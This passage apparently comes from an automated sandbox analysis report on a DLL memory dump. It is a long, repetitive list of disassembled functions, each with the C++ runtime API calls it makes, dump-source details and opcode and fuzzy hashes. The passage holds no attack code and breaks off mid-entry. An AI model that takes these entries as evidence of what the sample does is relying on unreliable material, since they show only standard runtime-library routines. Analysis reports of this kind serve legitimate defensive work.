                                                                                                                          • Instruction Fuzzy Hash: 7E01EDBA85011EDBCF01DBE4CD54AFEB77BAF81718F640A09D4116B280DF7099068780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7580
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F758A
                                                                                                                          • int.LIBCPMT ref: 6E2F75A1
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F75DB
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F75FB
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7608
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: ed2e4a6519a31347f5a5f712295cbd9d63dd8059cfef2f9aece4b3186e5369ed
                                                                                                                          • Instruction ID: 4e97293a17dbe48aaab00c060f0bfe5ef904b7b702869bfbab8406ccdcba4710
                                                                                                                          • Opcode Fuzzy Hash: ed2e4a6519a31347f5a5f712295cbd9d63dd8059cfef2f9aece4b3186e5369ed
                                                                                                                          • Instruction Fuzzy Hash: 0D01ED7A98051ECBCF01DBE4C854AEEF77BAF42319F104819D8206B280DF709A028B81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7A28
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7A32
                                                                                                                          • int.LIBCPMT ref: 6E2F7A49
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7A83
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7AA3
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7AB0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: b4c8881cb6afe6c378c2839ff9457bb493d4a24f1f21b8533cc5a823274dde1f
                                                                                                                          • Instruction ID: 630204975c4c71ef368b88a043ff29ac7a43fc10d27b993800ab26d871a029b0
                                                                                                                          • Opcode Fuzzy Hash: b4c8881cb6afe6c378c2839ff9457bb493d4a24f1f21b8533cc5a823274dde1f
                                                                                                                          • Instruction Fuzzy Hash: 1D01A17694051EDBCF01DBE4C854AEEB77BAF41314F150809E4116B280EF709A468791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1B73
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1B7D
                                                                                                                          • int.LIBCPMT ref: 6E2F1B94
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1BCE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1BEE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1BFB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: e1447d628a4eb73d17e6319073b44a669d2de34783b0a25c0863ef5a86d0842e
                                                                                                                          • Instruction ID: 8e344f7e38f915e660da1f8768f82b0b92cac2bec0441faab920f5361cc4ff88
                                                                                                                          • Opcode Fuzzy Hash: e1447d628a4eb73d17e6319073b44a669d2de34783b0a25c0863ef5a86d0842e
                                                                                                                          • Instruction Fuzzy Hash: 1F01EDBA84051ECBCF01DBE4CA94AEEF77BAF41318F544809D4116B280EF709A878B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F73BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F73C1
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F73CB
                                                                                                                          • int.LIBCPMT ref: 6E2F73E2
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F741C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F743C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7449
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: addb37c43964ab68725a7bb3832ae5813f147d86176ea749a30871613d4064be
                                                                                                                          • Instruction ID: c0cc93da311738c5d68fd668158cfe851555a51e9e29c7c0960e9e65cc499dab
                                                                                                                          • Opcode Fuzzy Hash: addb37c43964ab68725a7bb3832ae5813f147d86176ea749a30871613d4064be
                                                                                                                          • Instruction Fuzzy Hash: 9601A17A94051EDBCF01DBE4D954AEEF77BAF41318F244809D810AB280DF7099079791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7BE7
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7BF1
                                                                                                                          • int.LIBCPMT ref: 6E2F7C08
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7C42
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7C62
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7C6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: ab98b6cc1240006164bda82f8ac6c4376b2044206a49cf1c04ac17979e073796
                                                                                                                          • Instruction ID: c9c818f340387238f3311e6fd71743ebc3b654b9fed98d0776a5aabe622e350a
                                                                                                                          • Opcode Fuzzy Hash: ab98b6cc1240006164bda82f8ac6c4376b2044206a49cf1c04ac17979e073796
                                                                                                                          • Instruction Fuzzy Hash: 24018B7A94051EDBCF05EBE4D954AEEB7BBAF85718F140909D4106B280DF709A068B81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7862, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7869
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7873
                                                                                                                          • int.LIBCPMT ref: 6E2F788A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F78C4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F78E4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F78F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: db0d25fe7f09fe62f92182f333e5874fcf8e2aca3005b58c24a567553e3fb56f
                                                                                                                          • Instruction ID: cd11242d226ea7d99949d897262e6479952afbe5c66fc4e4a7b9d44b1b8bef11
                                                                                                                          • Opcode Fuzzy Hash: db0d25fe7f09fe62f92182f333e5874fcf8e2aca3005b58c24a567553e3fb56f
                                                                                                                          • Instruction Fuzzy Hash: F801ED7A94011EDBCF01DBE4D955AEEFB7BBF81718F240809D4106B280DF709942D781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7993
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F799D
                                                                                                                          • int.LIBCPMT ref: 6E2F79B4
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F79EE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7A0E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7A1B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 537fcd8025759540b7059143b060d742e2170d9e8741950e0e53e992fbf4466a
                                                                                                                          • Instruction ID: e7357c7486df5df563235f74aee41e41d0384e05cc94a078a754c915e5d297f9
                                                                                                                          • Opcode Fuzzy Hash: 537fcd8025759540b7059143b060d742e2170d9e8741950e0e53e992fbf4466a
                                                                                                                          • Instruction Fuzzy Hash: 7801ED7A84051ECBCF01DBE4D954AEEFB7BAF45718F11480AE8116B280DF709A02CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2E72B0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF95F
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF96B
                                                                                                                            • Part of subcall function 6E2EF8E0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF998
                                                                                                                            • Part of subcall function 6E30E156: RaiseException.KERNEL32(E06D7363,00000001,00000003,6E30AF34,?,?,?,6E30AF34,?,6E376BD4), ref: 6E30E1B6
                                                                                                                          • task.LIBCPMTD ref: 6E2E73D2
                                                                                                                          • task.LIBCPMTD ref: 6E2E73E1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorExceptionRaise
                                                                                                                          • String ID: =Y.nDq6n$Dq6n
                                                                                                                          • API String ID: 2403370058-3119292408
                                                                                                                          • Opcode ID: 8732f0ee543e46bd86a60d1bb9fc9a52e1c99f85b75c58516a334cdc17230d04
                                                                                                                          • Instruction ID: 14f4071c195ca4dd88ce738d9ab30d4a443aac308d4044bc8a804487ae99cf0e
                                                                                                                          • Opcode Fuzzy Hash: 8732f0ee543e46bd86a60d1bb9fc9a52e1c99f85b75c58516a334cdc17230d04
                                                                                                                          • Instruction Fuzzy Hash: 0F412875D0021DDFDB14CFE4C890AEEFBBABF44314F508669D415AB685EB706A05CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FE031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2204710431-1686923651
                                                                                                                          • Opcode ID: 8b1d875aaf92dd5ce9a44f6825daa27c7f1bf03cc981819b9a3175fb5841eca0
                                                                                                                          • Instruction ID: 1941ddf2010f389db1c7c865bf804e96ef270fd76d89386dd51ab88276269758
                                                                                                                          • Opcode Fuzzy Hash: 8b1d875aaf92dd5ce9a44f6825daa27c7f1bf03cc981819b9a3175fb5841eca0
                                                                                                                          • Instruction Fuzzy Hash: DB2195B1944A56AFD722CFB4C45077BBEFDAB08614F04491EE499C7A41E774D602CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E332B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3033488037-0
                                                                                                                          • Opcode ID: 4b311b1b0af0cbcfbf6fcdf2e622d71423175fedf59ca6c1ff5fc99998d58f7b
                                                                                                                          • Instruction ID: 1fbfe1097f31ab092647670b083c3619b0f3f54f6c6aa2f80df11c6f284f7c3f
                                                                                                                          • Opcode Fuzzy Hash: 4b311b1b0af0cbcfbf6fcdf2e622d71423175fedf59ca6c1ff5fc99998d58f7b
                                                                                                                          • Instruction Fuzzy Hash: 8751D532A00655AFDB10DFA9DE80FAA77F8FF48724F644969E845DB250E732D901CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 6E33CEFD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33CF0F
                                                                                                                          • _free.LIBCMT ref: 6E33CF21
                                                                                                                          • _free.LIBCMT ref: 6E33CF33
                                                                                                                          • _free.LIBCMT ref: 6E33CF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 3d12073a8b91e7d7f2039cff8759411351c58214e7ce865aa1bb7e9c12f4eb34
                                                                                                                          • Instruction ID: 374d8fbff1916a6e0f96a5ba4a2b14380913039e27eca6cdad3f9715ee7af797
                                                                                                                          • Opcode Fuzzy Hash: 3d12073a8b91e7d7f2039cff8759411351c58214e7ce865aa1bb7e9c12f4eb34
                                                                                                                          • Instruction Fuzzy Hash: B7F06735509AB49BCA40DBE8E480DDB37EDAE05614BB84C09F098DB501CB35F880CBA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2E6020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Smanip$task
                                                                                                                          • String ID: .
                                                                                                                          • API String ID: 1925983085-248832578
                                                                                                                          • Opcode ID: c9f6988130762c939c20bb7d7bf4f479e1f83d5c734ac733f4935c829b97dd88
                                                                                                                          • Instruction ID: cf44b3dc242e7f47fdaa131a7a4e514e4c748a57e973c4fabb8eebf212682165
                                                                                                                          • Opcode Fuzzy Hash: c9f6988130762c939c20bb7d7bf4f479e1f83d5c734ac733f4935c829b97dd88
                                                                                                                          • Instruction Fuzzy Hash: 948151B590052CDFCF08CF98CA91FEE77BAFB45304F608999D206A7644D734AA48DB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FDF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2FDF6D
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F681A
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6837
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6854
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6866
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6879
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FDFFA
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FE014
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2939335142-1686923651
                                                                                                                          • Opcode ID: fd46dc29aa46e717099cbaed68e91b9db08437f18c3868a2ed487493ee1fb327
                                                                                                                          • Instruction ID: a20f9362983d6b8e86c141f3547390a348baead3c7da57a917bd16ac7190b91e
                                                                                                                          • Opcode Fuzzy Hash: fd46dc29aa46e717099cbaed68e91b9db08437f18c3868a2ed487493ee1fb327
                                                                                                                          • Instruction Fuzzy Hash: C42195B1944B56AFD721CFB5C450B7BBEFDAB08218F040A1EE499C7A41D734D602CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E306B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 4281374311-1686923651
                                                                                                                          • Opcode ID: adce3ed48cbb4115ba3addcc80a19f985c9e76ee97ec59757d131e5e93c82fa7
                                                                                                                          • Instruction ID: 62ab6ec2f3b82bfa3bff4b5d46d85ae4e923280f0da55ab25b009383eddcf1eb
                                                                                                                          • Opcode Fuzzy Hash: adce3ed48cbb4115ba3addcc80a19f985c9e76ee97ec59757d131e5e93c82fa7
                                                                                                                          • Instruction Fuzzy Hash: AD2181B1904A566FDB25CFB5889077BBEECAB08204F040A1AE499C7A41E734D642CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F02A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1384045349-0
                                                                                                                          • Opcode ID: 7f932cee661cacc641da44025e9e8b077a8f819ed135275e6f994e290aabbaed
                                                                                                                          • Instruction ID: b34c489cb46cc008bbadbd2723b8fe11d5cf0ab23e4e7782449adb9cfe504439
                                                                                                                          • Opcode Fuzzy Hash: 7f932cee661cacc641da44025e9e8b077a8f819ed135275e6f994e290aabbaed
                                                                                                                          • Instruction Fuzzy Hash: 4B4107B5C0025CDFDB24CFE4D940BDDBBB9BB48308F5086A9E419AB681EB755A44CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E3308CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 972320c431860451d0cbb62afa00534eced5cdb7b9f37e4a289f7a9cfcfa86ca
                                                                                                                          • Instruction ID: e2ac52026d20e8d00d18fd9a0af3f1b0f91693b8afaad3d62f2c281fee02faab
                                                                                                                          • Opcode Fuzzy Hash: 972320c431860451d0cbb62afa00534eced5cdb7b9f37e4a289f7a9cfcfa86ca
                                                                                                                          • Instruction Fuzzy Hash: 1121C672A056B1EFEB515AFA8C44F5A776D9B02B60F310520E955AB2A4F631E900CDE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                          • _free.LIBCMT ref: 6E32F2FB
                                                                                                                          • _free.LIBCMT ref: 6E32F331
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          • Opcode ID: 51e56ae17893c490ac4cf0a7be59ada16acb2bfb55adffe50c4ec9ee712faffb
                                                                                                                          • Instruction ID: 0d6434f6b54fb192c635a745ec2053ecfa29ca4017bc12bd6cd36aea464e9b96
                                                                                                                          • Opcode Fuzzy Hash: 51e56ae17893c490ac4cf0a7be59ada16acb2bfb55adffe50c4ec9ee712faffb
                                                                                                                          • Instruction Fuzzy Hash: 71110636214A626EEB411AF49CC0DAB329D9BC2779B350A34F2F4A61C0EF22C805C160
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F3F5
                                                                                                                          • _free.LIBCMT ref: 6E32F452
                                                                                                                          • _free.LIBCMT ref: 6E32F488
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F493
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          • Opcode ID: 8e86015c3aeababa443f1cd9df93564e26fcb3b418949a99d937d2b064ab3497
                                                                                                                          • Instruction ID: 62b231322e250cb7cdf5cb1df1f20cdf6531a7838ba9be3fe84c5243a7b01c4b
                                                                                                                          • Opcode Fuzzy Hash: 8e86015c3aeababa443f1cd9df93564e26fcb3b418949a99d937d2b064ab3497
                                                                                                                          • Instruction Fuzzy Hash: BC110C327149616EEB612AF99C80DAB33ADABC2779B740A34F5F4A61C0EF71C804C520
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EF800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF87F
                                                                                                                          • task.LIBCPMTD ref: 6E2EF88B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF8A0
                                                                                                                          • task.LIBCPMTD ref: 6E2EF8B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          • Opcode ID: a069ca92dd21cf5a51658edc304eed40881dd856149aafa134e30076ce0b04bb
                                                                                                                          • Instruction ID: f71008d6646097940dd21a7758dc19470aaceb32bf6d5a2284920cf086d7526b
                                                                                                                          • Opcode Fuzzy Hash: a069ca92dd21cf5a51658edc304eed40881dd856149aafa134e30076ce0b04bb
                                                                                                                          • Instruction Fuzzy Hash: 2B214A75D0025CEBCB04CFE4C840BDEBBB9BF48314F508569E429AB684DB306A05CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EF8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
